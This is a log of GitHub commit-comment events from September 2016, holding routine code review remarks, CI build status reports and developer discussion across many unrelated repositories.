{"id":"4570275176","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19043142,"position":4,"line":6,"path":"src/System.Security.Cryptography.Primitives/pkg/System.Security.Cryptography.Primitives.pkgproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T19:42:44Z","updated_at":"2016-09-15T19:42:44Z","body":"OK I'll remove the Primitive proj stuff from this PR"}},"created_at":"2016-09-15T19:42:44Z"}
{"id":"4570276071","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19043145,"position":null,"line":null,"path":null,"commit_id":"b1ea9219066c6a664485e542f4df65864c8ad960","created_at":"2016-09-15T19:42:53Z","updated_at":"2016-09-15T19:42:53Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35489/testReport/) for this commit**"}},"created_at":"2016-09-15T19:42:53Z"}
{"id":"4570276425","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19043146,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T19:42:57Z","updated_at":"2016-09-15T19:42:57Z","body":"bitbake just rebuilds everything that depends or rdepends on Python, however it's not necessary in this case.\r\nI only replaced the directly affected Python packages (All packages with python in name and 2.7.11 as version) and no others. Worked fine.\r\nWill try to find out what the real reason is ...\r\n\r\nBTW: All those \"circular dependencies\" came with latest opkg.\r\nWe should really, really downgrade it to what we had in OpenATV 4.2, that was the last working version.\r\nSince then, opkg can not upgrade busybox anymore, fails rather than warns on missing packages (and thus skips the other packages to install, Captain made a hack for this) and has this circular dependency shit."}},"created_at":"2016-09-15T19:42:57Z"}
{"id":"4570277403","type":"CommitCommentEvent","actor":{"login":"rschick"},"repo":{"name":"mikepaulsond2l/node-auth-validation"},"payload":{"comment":{"id":19043151,"position":12,"line":210,"path":"src/index.js","commit_id":"a07282177ec21b5b77c06a4938517b1e6d9de762","created_at":"2016-09-15T19:43:08Z","updated_at":"2016-09-15T19:43:08Z","body":"You probably only want to call `.ca()` if `self._cert` is truthy."}},"created_at":"2016-09-15T19:43:08Z"}
{"id":"4570278622","type":"CommitCommentEvent","actor":{"login":"tlycken"},"repo":{"name":"Fysiksektionen/latex-fstil"},"payload":{"comment":{"id":19043154,"position":null,"line":null,"path":null,"commit_id":"55a45c429a432773073855c4efc4162303b4d14c","created_at":"2016-09-15T19:43:20Z","updated_at":"2016-09-15T19:43:20Z","body":":100: :+1: :exclamation: \r\n\r\nNu kanske det får stå kvar ett tag! :smile: "}},"created_at":"2016-09-15T19:43:20Z"}
{"id":"4570279595","type":"CommitCommentEvent","actor":{"login":"kentdelpino"},"repo":{"name":"kentdelpino/KENTer_LPC824"},"payload":{"comment":{"id":19043160,"position":null,"line":null,"path":null,"commit_id":"aff434ce374ccd450ea2b34dd9c047ca2a08d8b6","created_at":"2016-09-15T19:43:31Z","updated_at":"2016-09-15T19:43:31Z","body":"Update text"}},"created_at":"2016-09-15T19:43:31Z"}
{"id":"4570280587","type":"CommitCommentEvent","actor":{"login":"ssp"},"repo":{"name":"ssp/gitx"},"payload":{"comment":{"id":19043161,"position":9,"line":66,"path":"Classes/git/PBGitIndex.h","commit_id":"ae7370c2fa4877e23c90297f6f0e2e67453dc0ab","created_at":"2016-09-15T19:43:42Z","updated_at":"2016-09-15T19:43:42Z","body":"Good point! I’ll try to pull things apart again …"}},"created_at":"2016-09-15T19:43:42Z"}
{"id":"4570282471","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043166,"position":87,"line":87,"path":"server/app/configure/authentication/local.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:44:02Z","updated_at":"2016-09-15T19:44:02Z","body":"typo"}},"created_at":"2016-09-15T19:44:02Z"}
{"id":"4570286879","type":"CommitCommentEvent","actor":{"login":"qingfengxia"},"repo":{"name":"FreeCAD/FreeCAD"},"payload":{"comment":{"id":19043177,"position":null,"line":null,"path":null,"commit_id":"f44df3cdf018f76c846da5b07ed498f574437405","created_at":"2016-09-15T19:44:51Z","updated_at":"2016-09-15T19:44:51Z","body":"\r\ncompiling failed on ubuntu 16.04\r\n\r\n[ 14%] Building CXX object src/Gui/CMakeFiles/FreeCADGui.dir/CommandMacro.cpp.o\r\nIn file included from /opt/FreeCAD/src/Gui/CommandMacro.cpp:28:0:\r\n/opt/FreeCAD/src/Gui/Command.h:246:51: error: ‘QByteArray’ does not name a type\r\n     static void runCommand(DoCmd_Type eType,const QByteArray& sCmd);\r\n\r\nmissing header <QByteArray> in precompile.h? \r\n\r\nThis commit seems a big change. Could you please explain why some where in forum, and its impact? \r\n\r\nThanks "}},"created_at":"2016-09-15T19:44:51Z"}
{"id":"4570288055","type":"CommitCommentEvent","actor":{"login":"agentlame"},"repo":{"name":"creesch/reddit-moderator-toolbox"},"payload":{"comment":{"id":19043181,"position":2,"line":2,"path":"extension/package.json","commit_id":"bcbeda254f04525b3a76778c2d7e4c0cbb2e2f1e","created_at":"2016-09-15T19:45:04Z","updated_at":"2016-09-15T19:45:04Z","body":"RIP yes@jetpack"}},"created_at":"2016-09-15T19:45:04Z"}
{"id":"4570293659","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19043192,"position":16,"line":17,"path":"src/System.Security.Cryptography.Algorithms/src/System.Security.Cryptography.Algorithms.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T19:46:03Z","updated_at":"2016-09-15T19:46:03Z","body":"Sorry misread that. I'll remove the ns1.7 ref"}},"created_at":"2016-09-15T19:46:03Z"}
{"id":"4570298165","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19043204,"position":null,"line":null,"path":null,"commit_id":"281993afc046cac5ad8a877ec74ef1e03d186eb4","created_at":"2016-09-15T19:46:52Z","updated_at":"2016-09-15T19:46:52Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=70)"}},"created_at":"2016-09-15T19:46:52Z"}
{"id":"4570298228","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19043206,"position":null,"line":null,"path":null,"commit_id":"df3fb784035ad641bfc8e03c575040a76e88ab76","created_at":"2016-09-15T19:46:53Z","updated_at":"2016-09-15T19:46:53Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=70)"}},"created_at":"2016-09-15T19:46:53Z"}
{"id":"4570298268","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19043205,"position":null,"line":null,"path":null,"commit_id":"0bc92a2e2896a848c4f4f5dfce15978c31e6b792","created_at":"2016-09-15T19:46:53Z","updated_at":"2016-09-15T19:46:53Z","body":"Collaborator:\nCorresponding review in collaborator has been closed. [Link to review](http://dev.visitry.org/ui#review:id=70)"}},"created_at":"2016-09-15T19:46:53Z"}
{"id":"4570303570","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19043218,"position":null,"line":null,"path":null,"commit_id":"0dac9af20af117b88d31addc4f1eec77f22f7498","created_at":"2016-09-15T19:47:52Z","updated_at":"2016-09-15T19:47:52Z","body":"@nadahar As you know i don't use it yet, that's said it's good to know about. Thanks.\r\nBut be used do not mean be necessary ;-)"}},"created_at":"2016-09-15T19:47:52Z"}
{"id":"4570305759","type":"CommitCommentEvent","actor":{"login":"sricharan123"},"repo":{"name":"navsreks/DLN-Validation"},"payload":{"comment":{"id":19043225,"position":null,"line":null,"path":null,"commit_id":"c9f15f609c731e034bef937732aaece2a8bd78e5","created_at":"2016-09-15T19:48:16Z","updated_at":"2016-09-15T19:48:16Z","body":"this should work..\r\nin paper-input add property and declare property pattern=\"[[pattern]]\"...\r\n\r\n  _roles: {\r\n                    type: Array,\r\n                    value:{\r\n                         \"AL\": {\r\n                            \"rule\": \"^[0-9]{1,7}$\",\r\n                            \"description\": [\r\n                                \"1-7 Numeric\"\r\n                            ]\r\n                        },\r\n\r\n                        \"AZ\": {\r\n                            \"rule\": \"(^[A-Z]{1}[0-9]{1,8}$)|(^[A-Z]{2}[0-9]{2,5}$)|(^[0-9]{9}$)\",\r\n                            \"description\": [\r\n                                \"1 Alpha + 1-8 Numeric\",\r\n                                \"2 Alpha + 2-5 Numeric\",\r\n                                \"9 Numeric\"\r\n                            ]\r\n                        }\r\n                      }\r\n                },\r\n\r\nin _stateChange function--\r\n\r\n  this.$.DLN.pattern = this._roles[this.userProfile.state].rule;"}},"created_at":"2016-09-15T19:48:16Z"}
{"id":"4570306296","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"CrossMiron/My_work"},"payload":{"comment":{"id":19043231,"position":16,"line":16,"path":"app/src/main/java/com/calculator/miron/testwork_03/MainActivity.java","commit_id":"a88108f377676b557c74cefecccfad91aca6c34b","created_at":"2016-09-15T19:48:23Z","updated_at":"2016-09-15T19:48:23Z","body":"findViewById может вернуть null и..."}},"created_at":"2016-09-15T19:48:23Z"}
{"id":"4570306509","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"CrossMiron/My_work"},"payload":{"comment":{"id":19043234,"position":17,"line":17,"path":"app/src/main/java/com/calculator/miron/testwork_03/MainActivity.java","commit_id":"a88108f377676b557c74cefecccfad91aca6c34b","created_at":"2016-09-15T19:48:25Z","updated_at":"2016-09-15T19:48:25Z","body":"...и тут будет NullPointerException, приложение упадет"}},"created_at":"2016-09-15T19:48:25Z"}
{"id":"4570307252","type":"CommitCommentEvent","actor":{"login":"egorpugin"},"repo":{"name":"coding3d/small3d"},"payload":{"comment":{"id":19043236,"position":15,"line":15,"path":"cppan.yml","commit_id":"1c394337630212f5aaf761cea80fe9d5f324c4af","created_at":"2016-09-15T19:48:33Z","updated_at":"2016-09-15T19:48:33Z","body":"Lines 15-17, 20 should be removed. This information will be filled on cppan website."}},"created_at":"2016-09-15T19:48:33Z"}
{"id":"4570307739","type":"CommitCommentEvent","actor":{"login":"dom96"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":19043239,"position":null,"line":null,"path":null,"commit_id":"6013240f5d4fcb48cf9dc30eb2addc78672b274b","created_at":"2016-09-15T19:48:39Z","updated_at":"2016-09-15T19:48:39Z","body":"This change appears to break old marshalled data. We need a transition path.\r\n\r\n```\r\nnimbot.nim(287) nimbot\r\nasyncdispatch.nim(1652) runForever\r\nasyncdispatch.nim(1327) poll\r\nasyncdispatch.nim(415) processPendingCallbacks\r\nasyncmacro.nim(34) cb\r\nasynchttpserver.nim(188) processClientIter\r\njester.nim(335) :anonymous\r\njester.nim(306) handleHTTPRequest\r\nasyncmacro.nim(47) handleRequest\r\nasyncmacro.nim(34) cb\r\njester.nim(270) handleRequestIter\r\nasyncmacro.nim(47) match\r\nasyncmacro.nim(34) cb\r\nnimbot.nim(241) matchIter\r\nirclogrender.nim(22) loadRenderer\r\nmarshal.nim(280) to\r\nmarshal.nim(253) loadAny\r\nmarshal.nim(185) loadAny\r\nmarshal.nim(185) loadAny\r\nmarshal.nim(170) loadAny\r\nmarshal.nim(232) loadAny\r\nmarshal.nim(57) utf8ToBinary\r\ninvalid binary encoding\r\n```"}},"created_at":"2016-09-15T19:48:39Z"}
{"id":"4570309470","type":"CommitCommentEvent","actor":{"login":"Lineflyer"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19043244,"position":null,"line":null,"path":null,"commit_id":"61fbe4e3ccff5becc20c505a45aaf46a5d19dc82","created_at":"2016-09-15T19:49:00Z","updated_at":"2016-09-15T19:49:00Z","body":"Question for this:\nIf I read it right, we now silently fail. Will the problen be visible to the user somehow?\nOr in other words: How will I be able on support to find this problem?"}},"created_at":"2016-09-15T19:49:00Z"}
{"id":"4570311332","type":"CommitCommentEvent","actor":{"login":"ovdessel"},"repo":{"name":"deinhorn/Group_5_Story"},"payload":{"comment":{"id":19043252,"position":null,"line":null,"path":null,"commit_id":"8ebcfffc5d0f1a3b714951dc08a1b1fb498c326d","created_at":"2016-09-15T19:49:20Z","updated_at":"2016-09-15T19:49:20Z","body":"cool story bro"}},"created_at":"2016-09-15T19:49:20Z"}
{"id":"4570312221","type":"CommitCommentEvent","actor":{"login":"frederickfogerty"},"repo":{"name":"enhancv/braintree-as-promised"},"payload":{"comment":{"id":19043258,"position":5,"line":18,"path":"src/promised.js","commit_id":"cbb40fb98e218379f3c300c45432466390d3018c","created_at":"2016-09-15T19:49:30Z","updated_at":"2016-09-15T19:49:30Z","body":"👍 "}},"created_at":"2016-09-15T19:49:30Z"}
{"id":"4570315215","type":"CommitCommentEvent","actor":{"login":"mafalda2007"},"repo":{"name":"MosesEsan/mesan-laravel-entrust-user-roles-permission"},"payload":{"comment":{"id":19043272,"position":null,"line":null,"path":null,"commit_id":"4ea5067ce16b3937fd877c327acd3e447a6bed4a","created_at":"2016-09-15T19:50:03Z","updated_at":"2016-09-15T19:50:03Z","body":"Hi MosesEsan,  I dont understand using table client-status. tks"}},"created_at":"2016-09-15T19:50:03Z"}
{"id":"4570322856","type":"CommitCommentEvent","actor":{"login":"erniejamison"},"repo":{"name":"teamdeepblue/caissa-chess"},"payload":{"comment":{"id":19043291,"position":null,"line":null,"path":null,"commit_id":"9befd8ded9723f076a595d66ed12e7011f993bbc","created_at":"2016-09-15T19:51:27Z","updated_at":"2016-09-15T19:51:27Z","body":"This is_obstructed? method is need some work. Horizontal and vertical cases pass rspec tests but the code for the diagonal case is not correct. Eventually FactoryGirl will need to be incorporated."}},"created_at":"2016-09-15T19:51:27Z"}
{"id":"4570330954","type":"CommitCommentEvent","actor":{"login":"amiga-500"},"repo":{"name":"todiadiyatmo/fix-w3tc"},"payload":{"comment":{"id":19043319,"position":null,"line":null,"path":null,"commit_id":"80b2f3d919412052055c1dbf6824d390448b5f2d","created_at":"2016-09-15T19:52:55Z","updated_at":"2016-09-15T19:52:55Z","body":"@todiadiyatmo thanks for letting us know the changes are lines 963-967.  Yea i wish i could help ya with the white space issue.  I have no clue. ~Kimberly"}},"created_at":"2016-09-15T19:52:55Z"}
{"id":"4570331913","type":"CommitCommentEvent","actor":{"login":"arssonist"},"repo":{"name":"arssonist/tictactoe"},"payload":{"comment":{"id":19043323,"position":null,"line":null,"path":null,"commit_id":"f0581d3bf83bb122934aec5ec2ae6dc229f6a833","created_at":"2016-09-15T19:53:06Z","updated_at":"2016-09-15T19:53:06Z","body":"X and 0 win function is buggy, and working correctly. Also the feature of giving a error when board is full is not working."}},"created_at":"2016-09-15T19:53:06Z"}
{"id":"4570342180","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19043347,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T19:54:57Z","updated_at":"2016-09-15T19:54:57Z","body":"Obviously there was a problem upgrading python-crypt, as that line 15 (16 actually) mentioned above imports sha1 from hashlib, which is part of -crypt.\r\n"}},"created_at":"2016-09-15T19:54:57Z"}
{"id":"4570347224","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043361,"position":8,"line":8,"path":"server/app/routes/tears/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:55:53Z","updated_at":"2016-09-15T19:55:53Z","body":"To add query strings:\r\n\r\n```js\r\nTear.findAll({where: req.query})\r\n```"}},"created_at":"2016-09-15T19:55:53Z"}
{"id":"4570347775","type":"CommitCommentEvent","actor":{"login":"islemaster"},"repo":{"name":"code-dot-org/code-dot-org"},"payload":{"comment":{"id":19043366,"position":17,"line":29,"path":"apps/src/applab/dataBrowser/EditTableRow.jsx","commit_id":"3dee3c851d432369e9325c80c72589d86d9c4304","created_at":"2016-09-15T19:55:59Z","updated_at":"2016-09-15T19:55:59Z","body":"Interesting.  The PureRenderMixin used to be a shorthand for this, now I\nthink it's recommended to use react-addons-shallow-compare for this _if_\nyour state is immutable (e.g. you can compare only the top levels).  If\nit's not, stick with the deep comparison you've written. :+1:\n\nhttps://facebook.github.io/react/docs/shallow-compare.html\n\nOn Thu, Sep 15, 2016 at 12:36 PM, David Bailey <notifications@github.com>\nwrote:\n\n> The component is re-rendered because the parent component is re-rendered.\n> A vague explanation is offered here for why rendering is not skipped by\n> default:\n>\n> By default, shouldComponentUpdate always returns true to prevent subtle bugs when state is mutated in place, but if you are careful to always treat state as immutable and to read only from props and state in render() then you can override shouldComponentUpdate with an implementation that compares the old props and state to their replacements.\n>\n> If performance is a bottleneck, especially with dozens or hundreds of components, use shouldComponentUpdate to speed up your app.\n>\n> https://facebook.github.io/react/docs/component-specs.html#updating-\n> shouldcomponentupdate\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/code-dot-org/code-dot-org/commit/3dee3c851d432369e9325c80c72589d86d9c4304#commitcomment-19043058>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABinkXwGJjkcOUuOlpc1W3wb6IXQcfn2ks5qqZ5YgaJpZM4J-FnV>\n> .\n>\n\n\n\n-- \nBrad Buchanan\nSoftware Engineer, Code.org\nbrad@code.org\n"}},"created_at":"2016-09-15T19:55:59Z"}
{"id":"4570347909","type":"CommitCommentEvent","actor":{"login":"TerraSkye"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":19043367,"position":5,"line":5,"path":"pom.xml","commit_id":"9ec75fb47030911477dc20c9d7be436bcf276ad2","created_at":"2016-09-15T19:56:00Z","updated_at":"2016-09-15T19:56:00Z","body":"kovjh"}},"created_at":"2016-09-15T19:56:00Z"}
{"id":"4570348287","type":"CommitCommentEvent","actor":{"login":"TerraSkye"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":19043368,"position":null,"line":null,"path":null,"commit_id":"9ec75fb47030911477dc20c9d7be436bcf276ad2","created_at":"2016-09-15T19:56:06Z","updated_at":"2016-09-15T19:56:06Z","body":"6ue59"}},"created_at":"2016-09-15T19:56:06Z"}
{"id":"4570348384","type":"CommitCommentEvent","actor":{"login":"pheonixstorm"},"repo":{"name":"MegaMek/mekhq"},"payload":{"comment":{"id":19043369,"position":null,"line":null,"path":null,"commit_id":"4d126f1abcf41d0d5c5006a9cdbb46d48842ae95","created_at":"2016-09-15T19:56:07Z","updated_at":"2016-09-15T19:56:07Z","body":"@neoancient \r\nYou might want to add the button for the SPAs back in unless you plan on adding all the new SPAs to the preset file and possibly update the code for the internal costs.\r\n\r\nAt some point some of the unofficial SPAs will be removed/replaced by SPAs in Campaign Operations."}},"created_at":"2016-09-15T19:56:07Z"}
{"id":"4570349989","type":"CommitCommentEvent","actor":{"login":"achiwhane"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19043373,"position":20,"line":50,"path":"MHacks/v1/serializers/serializers.py","commit_id":"dc902194aca8b706d5d1b20114e1c557853d0780","created_at":"2016-09-15T19:56:26Z","updated_at":"2016-09-15T19:56:26Z","body":"Yeah we don't need both. I'll remove it the `can_only_scan_once_per_user` field"}},"created_at":"2016-09-15T19:56:26Z"}
{"id":"4570352592","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19043383,"position":null,"line":null,"path":null,"commit_id":"908f1b75243f5a6f92cf374b6eff2a4bb540e450","created_at":"2016-09-15T19:56:53Z","updated_at":"2016-09-15T19:56:53Z","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-908f1b75243f5a6f92cf374b6eff2a4bb540e450-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T19:56:53Z"}
{"id":"4570352972","type":"CommitCommentEvent","actor":{"login":"jezdez"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19043385,"position":null,"line":null,"path":null,"commit_id":"1d791d08cccdef1291aad52870cdcc7b4e85f11d","created_at":"2016-09-15T19:56:57Z","updated_at":"2016-09-15T19:56:57Z","body":"❤️ "}},"created_at":"2016-09-15T19:56:57Z"}
{"id":"4570353986","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043387,"position":45,"line":45,"path":"server/app/routes/users/cartRouter.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:57:10Z","updated_at":"2016-09-15T19:57:10Z","body":"Can also do (in just one SQL query) Model#destroy"}},"created_at":"2016-09-15T19:57:10Z"}
{"id":"4570355162","type":"CommitCommentEvent","actor":{"login":"pheonixstorm"},"repo":{"name":"MegaMek/mekhq"},"payload":{"comment":{"id":19043392,"position":null,"line":null,"path":null,"commit_id":"4d126f1abcf41d0d5c5006a9cdbb46d48842ae95","created_at":"2016-09-15T19:57:23Z","updated_at":"2016-09-15T19:57:23Z","body":"Also, looking at this commit the AtB preset didn't seem to make it."}},"created_at":"2016-09-15T19:57:23Z"}
{"id":"4570355415","type":"CommitCommentEvent","actor":{"login":"matthayes"},"repo":{"name":"confluentinc/confluent-kafka-python"},"payload":{"comment":{"id":19043394,"position":35,"line":61,"path":"confluent_kafka/avro/AvroProducer.py","commit_id":"3b27212cf423e3a24426b3d76bc583993c5d0a68","created_at":"2016-09-15T19:57:26Z","updated_at":"2016-09-15T19:57:26Z","body":"This should be `*args, **kwargs`, otherwise I don't think it works."}},"created_at":"2016-09-15T19:57:26Z"}
{"id":"4570357164","type":"CommitCommentEvent","actor":{"login":"MosesEsan"},"repo":{"name":"MosesEsan/mesan-laravel-entrust-user-roles-permission"},"payload":{"comment":{"id":19043399,"position":null,"line":null,"path":null,"commit_id":"4ea5067ce16b3937fd877c327acd3e447a6bed4a","created_at":"2016-09-15T19:57:44Z","updated_at":"2016-09-15T19:57:44Z","body":"The client status table holds the different kind of status for the clients (e.g., Active, inactive etc), this allows the admin user to add new types of status.\r\n\r\nIf you log into the demo http://ec2-52-53-171-177.us-west-1.compute.amazonaws.com/login and attempt to add a client, it should make more sense. \r\n\r\nemail: admin@test.com\r\npwd: testadmin\r\n\r\n\r\nLet me know if you have any or questions."}},"created_at":"2016-09-15T19:57:44Z"}
{"id":"4570357533","type":"CommitCommentEvent","actor":{"login":"Federico-leites"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19043401,"position":null,"line":null,"path":null,"commit_id":"941da352dddbb9637ca5105d4970b34cfad0c3b4","created_at":"2016-09-15T19:57:48Z","updated_at":"2016-09-15T19:57:48Z","body":"genial! gracias! hacia alli vamos!! yo tamien no veo la hora de mover las fichias jaja\r\n"}},"created_at":"2016-09-15T19:57:48Z"}
{"id":"4570360292","type":"CommitCommentEvent","actor":{"login":"matthayes"},"repo":{"name":"confluentinc/confluent-kafka-python"},"payload":{"comment":{"id":19043410,"position":40,"line":133,"path":"confluent_kafka/avro/CachedSchemaRegistryClient.py","commit_id":"3b27212cf423e3a24426b3d76bc583993c5d0a68","created_at":"2016-09-15T19:58:19Z","updated_at":"2016-09-15T19:58:19Z","body":"nit: parentheses are not necessary"}},"created_at":"2016-09-15T19:58:19Z"}
{"id":"4570366798","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"tessaSAC/TEARGET"},"payload":{"comment":{"id":19043429,"position":16,"line":16,"path":"server/db/index.js","commit_id":"cc63478cfdce79ad2aaa6507a3e3ae23e624e0d8","created_at":"2016-09-15T19:59:30Z","updated_at":"2016-09-15T19:59:30Z","body":"Maybe add `Tear.belongsTo(Man)`"}},"created_at":"2016-09-15T19:59:30Z"}
{"id":"4565699207","type":"CommitCommentEvent","actor":{"login":"tobyhede"},"repo":{"name":"AusDTO/dto-dashboard"},"payload":{"comment":{"id":19029618,"position":null,"line":null,"path":null,"commit_id":"0e90e37a21b992a6d08435de6432d196317cb3dc","created_at":"2016-09-15T02:00:32Z","updated_at":"2016-09-15T02:00:32Z","body":"Sorry, I thought we needed it. I am a bit confused too. I think lets drop it for now, can always add it "}},"created_at":"2016-09-15T02:00:32Z"}
{"id":"4565699809","type":"CommitCommentEvent","actor":{"login":"hugocorbucci"},"repo":{"name":"agile-alliance-brazil/election"},"payload":{"comment":{"id":19029619,"position":null,"line":null,"path":null,"commit_id":"0c2cd77cf4aa1dd8f7c7139a7af3fa408e9b698f","created_at":"2016-09-15T02:00:45Z","updated_at":"2016-09-15T02:00:45Z","body":"This also contributes to #9 "}},"created_at":"2016-09-15T02:00:45Z"}
{"id":"4565700478","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19029625,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T02:01:02Z","updated_at":"2016-09-15T02:01:02Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-15T02:01:02Z"}
{"id":"4565703064","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19029628,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-15T02:02:02Z","updated_at":"2016-09-15T02:02:02Z","body":"makingPrettyTransition (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2328 of 2335 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T02:02:02Z"}
{"id":"4565704269","type":"CommitCommentEvent","actor":{"login":"zchai"},"repo":{"name":"zchai/chat"},"payload":{"comment":{"id":19029632,"position":2,"line":2,"path":"README.md","commit_id":"7aab3c9be650fa7167c242599a732a41fc04b7b8","created_at":"2016-09-15T02:02:31Z","updated_at":"2016-09-15T02:02:31Z","body":"聊天是用udp发送广播，传输文件新建了一个客户端和服务端。"}},"created_at":"2016-09-15T02:02:31Z"}
{"id":"4565704388","type":"CommitCommentEvent","actor":{"login":"nbehary"},"repo":{"name":"aosp-msm8960/android_device_asus_flo"},"payload":{"comment":{"id":19029633,"position":null,"line":null,"path":null,"commit_id":"f676aef2e5894675cd60357e0d04d279a5ab6a99","created_at":"2016-09-15T02:02:34Z","updated_at":"2016-09-15T02:02:34Z","body":"I don't understand why going this way was the answer.  I'd think just the product name being razor would fix the n7 2012 issue.  Why the fingerprint and build desc?  Why not just finish fixing the build to use razor instead of aosp_flo throughout without the overrrides?\r\n\r\nI mean, this works, and there may be things I don't know as to why it is a good idea, but it seems hacky."}},"created_at":"2016-09-15T02:02:34Z"}
{"id":"4565710320","type":"CommitCommentEvent","actor":{"login":"tuongaz"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19029641,"position":null,"line":null,"path":null,"commit_id":"596392165523ca49ae4acb34d62bdac6eb414537","created_at":"2016-09-15T02:04:47Z","updated_at":"2016-09-15T02:04:47Z","body":"cool"}},"created_at":"2016-09-15T02:04:47Z"}
